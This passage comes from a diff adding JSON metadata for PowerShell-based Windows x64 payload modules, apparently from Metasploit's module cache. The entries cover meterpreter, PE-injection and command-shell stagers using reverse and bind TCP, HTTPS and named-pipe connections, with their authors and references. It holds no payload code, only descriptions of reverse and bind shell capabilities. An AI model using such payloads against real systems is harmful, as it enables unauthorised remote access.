"/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_https", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/powershell/x64/meterpreter/reverse_named_pipe": { + "name": "Powershell Exec, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/powershell/x64/meterpreter/reverse_tcp": { + "name": "Powershell Exec, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid": { + "name": "Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/meterpreter/reverse_winhttp": { + "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/powershell/x64/meterpreter/reverse_winhttps": { + "name": "Powershell Exec, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/powershell/x64/peinject/bind_ipv6_tcp": { + "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/peinject/bind_named_pipe": { + "name": "Powershell Exec, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "UserExistsError" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/powershell/x64/peinject/bind_tcp": { + "name": "Powershell Exec, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/powershell/x64/peinject/bind_tcp_rc4": { + "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/peinject/bind_tcp_uuid": { + "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/peinject/reverse_named_pipe": { + "name": "Powershell Exec, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/powershell/x64/peinject/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/powershell/x64/peinject/reverse_tcp": { + "name": "Powershell Exec, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/peinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/powershell/x64/peinject/reverse_tcp_rc4": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/peinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/peinject/reverse_tcp_uuid": { + "name": "Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/peinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/pingback_reverse_tcp": { + "name": "Powershell Exec, Windows x64 Pingback, Reverse TCP Inline", + "fullname": "payload/cmd/windows/powershell/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to attacker and report UUID (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/x64/powershell_bind_tcp": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/x64/powershell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/powershell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/powershell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/x64/powershell_reverse_tcp": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/x64/powershell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/powershell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/x64/powershell_reverse_tcp_ssl": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/x64/powershell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/powershell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", + "staged": false + }, + "payload_cmd/windows/powershell/x64/shell/bind_ipv6_tcp": { + "name": "Powershell Exec, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/shell/bind_named_pipe": { + "name": "Powershell Exec, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/x64/shell/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "UserExistsError" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/powershell/x64/shell/bind_tcp": { + "name": "Powershell Exec, Windows x64 Command Shell, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/powershell/x64/shell/bind_tcp_rc4": { + "name": "Powershell Exec, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/shell/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + 